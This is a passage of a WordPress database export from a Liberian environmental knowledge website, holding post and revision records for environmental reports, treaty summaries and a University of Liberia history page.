study </span><span dir=\"ltr\" role=\"presentation\">area. Other small carnivore species found, including Honey Badger</span> <span dir=\"ltr\" role=\"presentation\">Mellivora capensis</span><span dir=\"ltr\" role=\"presentation\">, are described. Liberian Mongoose</span> <span dir=\"ltr\" role=\"presentation\">Liberi</span><span dir=\"ltr\" role=\"presentation\">ictis kuhni</span> <span dir=\"ltr\" role=\"presentation\">was not detected, but local reports suggest that it was historically present and may persist at low density.</span>','A Survey of Small Carnivores at Putu Mountains, Southeast Liberia','','inherit','closed','closed','','4888-autosave-v1','','','2022-08-10 15:53:12','2022-08-10 15:53:12','',4888,'https://ekmsliberia.info/?p=4892',0,'revision','',0),(4893,42,'2022-08-10 15:57:53','2022-08-10 15:57:53','<span dir=\"ltr\" role=\"presentation\">This report is the second volume of the terminal evaluation of the projects ‘the Economics of Ecosystems and Biodiversity’ (TEEB) Phase III and ENRTP-funded sub-<br role=\"presentation\" />component: ‘National Implementation: Reflecting the Value of Ecosystems and Biodiversity in Policy-making’ implemented between 2014 and 2018. This volume contains material specific to the ENRTP-funded component. The project aims to promote a better understanding of the value of ecosystem services and to offer economic tools that take proper account of this value. It was designed around three interlinked activity areas which build on previous phases of the TEEB initiative, namely: i) advance natural capital accounting by undertaking country assessments and assessments in ‘externalities heavy’ industry sectors; ii) deepen the analysis on specific ‘biomes’ and ‘sectors’; iii) support in-depth examinations to identify ways to ‘work with nature’ to meet country- specific policy priorities, with an initial focus on five pilot countries.</span>','Terminal Evaluation of The Economics of Ecosystems and Biodiversity (TEEB) National Implementation: Reflecting the Value of Ecosystems and Biodiversity in Policymaking','','publish','closed','closed','','terminal-evaluation-of-the-economics-of-ecosystems-and-biodiversity-teeb-national-implementation-reflecting-the-value-of-ecosystems-and-biodiversity-in-policymaking','','','2022-08-10 15:59:15','2022-08-10 15:59:15','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4893',48,'document','',0),(4894,42,'2022-08-10 15:53:45','2022-08-10 15:53:45','','TEEB phase III','','inherit','open','closed','','teeb-phase-iii','','','2022-08-10 15:53:45','2022-08-10 15:53:45','',4893,'https://ekmsliberia.info/wp-content/uploads/2022/08/TEEB-phase-III.pdf',0,'attachment','application/pdf',0),(4895,42,'2022-08-10 15:57:53','2022-08-10 15:57:53','<span dir=\"ltr\" role=\"presentation\">This report is the second volume of the terminal evaluation of the projects ‘the Economics of Ecosystems and Biodiversity’ (TEEB) Phase III and ENRTP-funded sub-<br role=\"presentation\" />component: ‘National Implementation: Reflecting the Value of Ecosystems and Biodiversity in Policy-making’ implemented between 2014 and 2018. This volume contains material specific to the ENRTP-funded component. The project aims to promote a better understanding of the value of ecosystem services and to offer economic tools that take proper account of this value. It was designed around three interlinked activity areas which build on previous phases of the TEEB initiative, namely: i) advance natural capital accounting by undertaking country assessments and assessments in ‘externalities heavy’ industry sectors; ii) deepen the analysis on specific ‘biomes’ and ‘sectors’; iii) support in-depth examinations to identify ways to ‘work with nature’ to meet country- specific policy priorities, with an initial focus on five pilot countries.</span>','Terminal Evaluation of The Economics of Ecosystems and Biodiversity (TEEB) National Implementation: Reflecting the Value of Ecosystems and Biodiversity in Policymaking','','inherit','closed','closed','','4893-revision-v1','','','2022-08-10 15:57:53','2022-08-10 15:57:53','',4893,'https://ekmsliberia.info/?p=4895',0,'revision','',0),(4896,42,'2022-08-10 15:58:53','2022-08-10 15:58:53','','Untitled','','inherit','open','closed','','untitled-16','','','2022-08-10 15:58:53','2022-08-10 15:58:53','',4893,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-7.png',0,'attachment','image/png',0),(4897,42,'2022-08-10 16:05:18','2022-08-10 16:05:18','<span dir=\"ltr\" role=\"presentation\">The</span> <span dir=\"ltr\" role=\"presentation\">TEEB Arctic Scoping Study</span> <span dir=\"ltr\" role=\"presentation\">is</span> <span dir=\"ltr\" role=\"presentation\">a</span><span dir=\"ltr\" role=\"presentation\">n early implementation pilot proj</span><span dir=\"ltr\" role=\"presentation\">ect that</span> <span dir=\"ltr\" role=\"presentation\">follow</span><span dir=\"ltr\" role=\"presentation\">s up on </span><span dir=\"ltr\" role=\"presentation\">specific recommendations of the</span> <span dir=\"ltr\" role=\"presentation\">Arctic Biodiversity Assessment</span> <span dir=\"ltr\" role=\"presentation\">(ABA)</span><span dir=\"ltr\" role=\"presentation\">. A key objective of </span><span dir=\"ltr\" role=\"presentation\">both this scoping study and</span> <span dir=\"ltr\" role=\"presentation\">options</span> <span dir=\"ltr\" role=\"presentation\">presented</span> <span dir=\"ltr\" role=\"presentation\">in the Way f</span><span dir=\"ltr\" role=\"presentation\">orward section is </span><span dir=\"ltr\" role=\"presentation\">implementation of ABA recommendations, in particular recommendation</span> <span dir=\"ltr\" role=\"presentation\">#4 on</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">incorporating biodiversity objectives and provisions into tools specific to development in the </span><span dir=\"ltr\" role=\"presentation\">Arctic, and recommendation #12 on evaluating services provided by Arctic biodiversity to </span><span dir=\"ltr\" role=\"presentation\">support decision making.</span>','The Economics of Ecosystems & Biodiversity Scoping Study for the Arctic','','publish','closed','closed','','the-economics-of-ecosystems-biodiversity-scoping-study-for-the-arctic','','','2022-08-10 16:05:18','2022-08-10 16:05:18','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4897',47,'document','',0),(4898,42,'2022-08-10 15:59:48','2022-08-10 15:59:48','','TEEB45','','inherit','open','closed','','teeb45','','','2022-08-10 15:59:48','2022-08-10 15:59:48','',4897,'https://ekmsliberia.info/wp-content/uploads/2022/08/TEEB45.pdf',0,'attachment','application/pdf',0),(4899,42,'2022-08-10 16:02:36','2022-08-10 16:02:36','','Untitled','','inherit','open','closed','','untitled-17','','','2022-08-10 16:02:36','2022-08-10 16:02:36','',4897,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-8.png',0,'attachment','image/png',0),(4900,42,'2022-08-10 16:05:18','2022-08-10 16:05:18','<span dir=\"ltr\" role=\"presentation\">The</span> <span dir=\"ltr\" role=\"presentation\">TEEB Arctic Scoping Study</span> <span dir=\"ltr\" role=\"presentation\">is</span> <span dir=\"ltr\" role=\"presentation\">a</span><span dir=\"ltr\" role=\"presentation\">n early implementation pilot proj</span><span dir=\"ltr\" role=\"presentation\">ect that</span> <span dir=\"ltr\" role=\"presentation\">follow</span><span dir=\"ltr\" role=\"presentation\">s up on </span><span dir=\"ltr\" role=\"presentation\">specific recommendations of the</span> <span dir=\"ltr\" role=\"presentation\">Arctic Biodiversity Assessment</span> <span dir=\"ltr\" role=\"presentation\">(ABA)</span><span dir=\"ltr\" role=\"presentation\">. A key objective of </span><span dir=\"ltr\" role=\"presentation\">both this scoping study and</span> <span dir=\"ltr\" role=\"presentation\">options</span> <span dir=\"ltr\" role=\"presentation\">presented</span> <span dir=\"ltr\" role=\"presentation\">in the Way f</span><span dir=\"ltr\" role=\"presentation\">orward section is </span><span dir=\"ltr\" role=\"presentation\">implementation of ABA recommendations, in particular recommendation</span> <span dir=\"ltr\" role=\"presentation\">#4 on</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">incorporating biodiversity objectives and provisions into tools specific to development in the </span><span dir=\"ltr\" role=\"presentation\">Arctic, and recommendation #12 on evaluating services provided by Arctic biodiversity to </span><span dir=\"ltr\" role=\"presentation\">support decision making.</span>','The Economics of Ecosystems & Biodiversity Scoping Study for the Arctic','','inherit','closed','closed','','4897-revision-v1','','','2022-08-10 16:05:18','2022-08-10 16:05:18','',4897,'https://ekmsliberia.info/?p=4900',0,'revision','',0),(4901,42,'2022-08-10 16:10:03','2022-08-10 16:10:03','','Screenshot 2022-08-10 at 16-09-17 Microsoft Word - ESIA Procedural Guideline.doc - ESIA-Procedural-Guideline.pdf','','inherit','open','closed','','screenshot-2022-08-10-at-16-09-17-microsoft-word-esia-procedural-guideline-doc-esia-procedural-guideline-pdf','','','2022-08-10 16:10:03','2022-08-10 16:10:03','',4874,'https://ekmsliberia.info/wp-content/uploads/2022/08/Screenshot-2022-08-10-at-16-09-17-Microsoft-Word-ESIA-Procedural-Guideline.doc-ESIA-Procedural-Guideline.pdf.png',0,'attachment','image/png',0),(4902,38,'2022-08-19 14:54:41','2022-08-19 14:54:41','<h2>Conventions & Protocols</h2>\n										<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png\" alt=\"Nagoya Protocol on Access and Benefits Sharing\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Nagoya Protocol on Access and Benefits Sharing</a>The Nagoya Protocol on Access and Benefit sharing was adopted by the Conference of the...<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png\" alt=\"Cartagena Protocol on Biosafety to the Convention on Biological Diversity\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Cartagena Protocol on Biosafety to the Convention on Biological Diversity</a>The Cartagena Protocol on Biosafety to the Convention on Biological Diversity was adopted by the...<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png\" alt=\"Stockholm Convention on Persistent Organic Pollutants\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Stockholm Convention on Persistent Organic Pollutants</a>The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from...<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-768x386.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-e1618235603738.jpg\" alt=\"United Nations Convention to Combat Desertification\" loading=\"lazy\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Learn More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2022-08-19 14:54:41','2022-08-19 14:54:41','',84,'https://ekmsliberia.info/?p=4902',0,'revision','',0),(4903,38,'2022-08-19 14:54:42','2022-08-19 14:54:42','<h2>Conventions & Protocols</h2>\n										<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png\" alt=\"Nagoya Protocol on Access and Benefits Sharing\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Nagoya Protocol on Access and Benefits Sharing</a>The Nagoya Protocol on Access and Benefit sharing was adopted by the Conference of the...<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png\" alt=\"Cartagena Protocol on Biosafety to the Convention on Biological Diversity\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Cartagena Protocol on Biosafety to the Convention on Biological Diversity</a>The Cartagena Protocol on Biosafety to the Convention on Biological Diversity was adopted by the...<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png\" alt=\"Stockholm Convention on Persistent Organic Pollutants\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Stockholm Convention on Persistent Organic Pollutants</a>The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from...<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-768x386.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-e1618235603738.jpg\" alt=\"United Nations Convention to Combat Desertification\" loading=\"lazy\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Learn More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2022-08-19 14:54:42','2022-08-19 14:54:42','',84,'https://ekmsliberia.info/?p=4903',0,'revision','',0),(4904,38,'2022-08-19 14:54:42','2022-08-19 14:54:42','<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png\" alt=\"Nagoya Protocol on Access and Benefits Sharing\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Nagoya Protocol on Access and Benefits Sharing</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/esamuels/\"  rel=\"author\">Elvina Samuels</a><a href=\"https://ekmsliberia.info/2021/04/16/\"  ><time datetime=\"2021-04-16T09:51:23+00:00\" title=\"2021-04-16T09:51:23+00:00\">April 16, 2021</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/#respond\" ></a>The Nagoya Protocol on Access and Benefit sharing was adopted by the Conference of the Parties to the Convention on&hellip;<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png\" alt=\"Cartagena Protocol on Biosafety to the Convention on Biological Diversity\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Cartagena Protocol on Biosafety to the Convention on Biological Diversity</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/esamuels/\"  rel=\"author\">Elvina Samuels</a><a href=\"https://ekmsliberia.info/2021/04/16/\"  ><time datetime=\"2021-04-16T09:40:23+00:00\" title=\"2021-04-16T09:40:23+00:00\">April 16, 2021</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/#respond\" ></a>The Cartagena Protocol on Biosafety to the Convention on Biological Diversity was adopted by the Conference of the Parties to&hellip;<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png\" alt=\"Stockholm Convention on Persistent Organic Pollutants\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Stockholm Convention on Persistent Organic Pollutants</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/esamuels/\"  rel=\"author\">Elvina Samuels</a><a href=\"https://ekmsliberia.info/2021/04/12/\"  ><time datetime=\"2021-04-12T13:43:31+00:00\" title=\"2021-04-12T13:43:31+00:00\">April 12, 2021</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/#respond\" ></a>The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from chemicals known as POPs. Liberia&hellip;<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/admin_2/\"  rel=\"author\">Administrator</a><a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:44:46+00:00\" title=\"2019-11-12T01:44:46+00:00\">November 12, 2019</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/#respond\" ></a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal&hellip;<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-e1618235603738.jpg\" alt=\"United Nations Convention to Combat Desertification\" loading=\"lazy\" width=\"370\" height=\"205\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/admin_2/\"  rel=\"author\">Administrator</a><a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:40:44+00:00\" title=\"2019-11-12T01:40:44+00:00\">November 12, 2019</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/#respond\" ></a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment&hellip;<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" loading=\"lazy\" width=\"370\" height=\"205\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/admin_2/\"  rel=\"author\">Administrator</a><a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:37:16+00:00\" title=\"2019-11-12T01:37:16+00:00\">November 12, 2019</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/#respond\" ></a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on&hellip;<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2022-08-19 14:54:42','2022-08-19 14:54:42','',84,'https://ekmsliberia.info/?p=4904',0,'revision','',0),(4905,42,'2022-08-19 14:58:37','0000-00-00 00:00:00','','Elementor #4905','','draft','closed','closed','','','','','2022-08-19 14:58:37','2022-08-19 14:58:37','',0,'https://ekmsliberia.info/?page_id=4905',0,'page','',0),(4906,42,'2022-08-19 14:58:36','2022-08-19 14:58:36','','Elementor #4905','','inherit','closed','closed','','4905-revision-v1','','','2022-08-19 14:58:36','2022-08-19 14:58:36','',4905,'https://ekmsliberia.info/?p=4906',0,'revision','',0),(4907,42,'2022-08-19 15:00:48','2022-08-19 15:00:48','','Universities','','publish','closed','closed','','university','','','2022-08-19 15:04:57','2022-08-19 15:04:57','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=4907',0,'_pods_pod','',0),(4908,42,'2022-08-19 15:00:51','2022-08-19 15:00:51','','More Fields','','publish','closed','closed','','more_fields','','','2022-08-19 15:04:57','2022-08-19 15:04:57','',4907,'https://ekmsliberia.info/?post_type=_pods_group&#038;p=4908',0,'_pods_group','',0),(4909,42,'2022-08-19 15:03:44','2022-08-19 15:03:44','','University Logo','','publish','closed','closed','','university_logo','','','2022-08-19 15:04:57','2022-08-19 15:04:57','',4907,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=4909',0,'_pods_field','',0),(4910,42,'2022-08-19 15:04:23','2022-08-19 15:04:23','','Website Link','','publish','closed','closed','','website_link','','','2022-08-19 15:04:57','2022-08-19 15:04:57','',4907,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=4910',1,'_pods_field','',0),(4911,42,'2022-08-19 15:11:40','2022-08-19 15:11:40','<!-- wp:paragraph -->\n<p>The University of Liberia was founded in 1862 as Liberia College and became a full University in 1951. It is a public institution funded mainly by the Government of Liberia. The University now has four campuses: Capitol Hill, Fendall, Medical School Fendall, and Starz-Sinji campus located in Sinji, Grand Cape Mount County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During its early formative years, financing for Liberia College was provided by the New York Colonization Society and the Trustees of Donation for Education in Liberia (TDEL), both were United States based organizations. The donations laid the cornerstone and financed the first building on January 25, 1858.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Beneath this effort was the belief that the “Republic of Liberia ought to have within itself the means of educating its citizens for all the duties of public and private.” Against this background, Professor Simon Greenleaf, the Harvard College Law Professor, who drafted Liberia’s Independence Constitution in 1847, led the effort to establish Liberia College.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In 1862, the first President of the Republic of Liberia, Honorable Joseph Jerkins Roberts, was inaugurated as the first President of Liberia College. Working with two professors, Rev. Alexander Cromwell and Professor Dr. Edward Wilmot Blyden, President Roberts opened the doors of Liberia College in February 1863 to seven students.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, for most of the next 90 years, the college had to struggle to overcome numerous obstacles to maintain its existence and integrity. As the sovereignty of the Liberian State remained challenged, so was uncertainty about the survival of Liberia College. The college was forced to close its doors on at least three separate occasions during this period. The Liberian State and the college managed to survive, however graduates were few, but the role that the leadership of the college played in Liberian society was significant, as were the contributions of its graduates.</p>\n<!-- /wp:paragraph -->','University of Liberia','','publish','closed','closed','','university-of-liberia','','','2022-08-22 10:10:00','2022-08-22 10:10:00','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4911',0,'university','',0),(4912,42,'2022-08-19 15:06:09','2022-08-19 15:06:09','','ul logo','','inherit','open','closed','','ul-logo','','','2022-08-22 10:10:00','2022-08-22 10:10:00','',4911,'https://ekmsliberia.info/wp-content/uploads/2022/08/ul-logo-1.png',0,'attachment','image/png',0),(4913,42,'2022-08-19 15:11:18','2022-08-19 15:11:18','','UL','','inherit','open','closed','','ul','','','2022-08-19 15:11:18','2022-08-19 15:11:18','',4911,'https://ekmsliberia.info/wp-content/uploads/2022/08/UL.jpg',0,'attachment','image/jpeg',0),(4914,42,'2022-08-19 15:13:36','0000-00-00 00:00:00','','Elementor #4914','','draft','closed','closed','','','','','2022-08-19 15:13:36','2022-08-19 15:13:36','',0,'https://ekmsliberia.info/?page_id=4914',0,'page','',0),(4915,42,'2022-08-19 15:13:34','2022-08-19 15:13:34','','Elementor #4914','','inherit','closed','closed','','4914-revision-v1','','','2022-08-19 15:13:34','2022-08-19 15:13:34','',4914,'https://ekmsliberia.info/?p=4915',0,'revision','',0),(4916,42,'2022-08-19 15:15:38','2022-08-19 15:15:38','','Elementor-post-screenshot_3834_2022-08-19-15-15-38_27115ce5.png','','inherit','open','closed','','elementor-post-screenshot_3834_2022-08-19-15-15-38_27115ce5-png','','','2022-08-19 15:15:38','2022-08-19 15:15:38','',3834,'https://ekmsliberia.info/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_3834_2022-08-19-15-15-38_27115ce5.png',0,'attachment','image/png',0),(4917,42,'2022-08-19 15:15:53','2022-08-19 15:15:53','','Elementor-post-screenshot_3877_2022-08-19-15-15-53_44ba73d4.png','','inherit','open','closed','','elementor-post-screenshot_3877_2022-08-19-15-15-53_44ba73d4-png','','','2022-08-19 15:15:53','2022-08-19 15:15:53','',3877,'https://ekmsliberia.info/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_3877_2022-08-19-15-15-53_44ba73d4.png',0,'attachment','image/png',0),(4918,42,'2022-08-19 15:29:45','2022-08-19 15:29:45','<ul>\n							<li>\n										Website Link\n									</li>\n						</ul>','Elementor Single Post #4918','','publish','closed','closed','','elementor-single-post-4918','','','2022-08-19 15:48:46','2022-08-19 15:48:46','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=4918',0,'elementor_library','',0),(4919,42,'2022-08-19 15:16:02','2022-08-19 15:16:02','','Elementor Single Post #4918','','inherit','closed','closed','','4918-revision-v1','','','2022-08-19 15:16:02','2022-08-19 15:16:02','',4918,'https://ekmsliberia.info/?p=4919',0,'revision','',0),(4920,42,'2022-08-19 15:34:53','2022-08-19 15:34:53','<a role=\"button\">\n						Website Link\n					</a>','Elementor Single Post #4918','','inherit','closed','closed','','4918-revision-v1','','','2022-08-19 15:34:53','2022-08-19 15:34:53','',4918,'https://ekmsliberia.info/?p=4920',0,'revision','',0),(4921,42,'2022-08-19 15:34:53','2022-08-19 15:34:53','<ul>\n							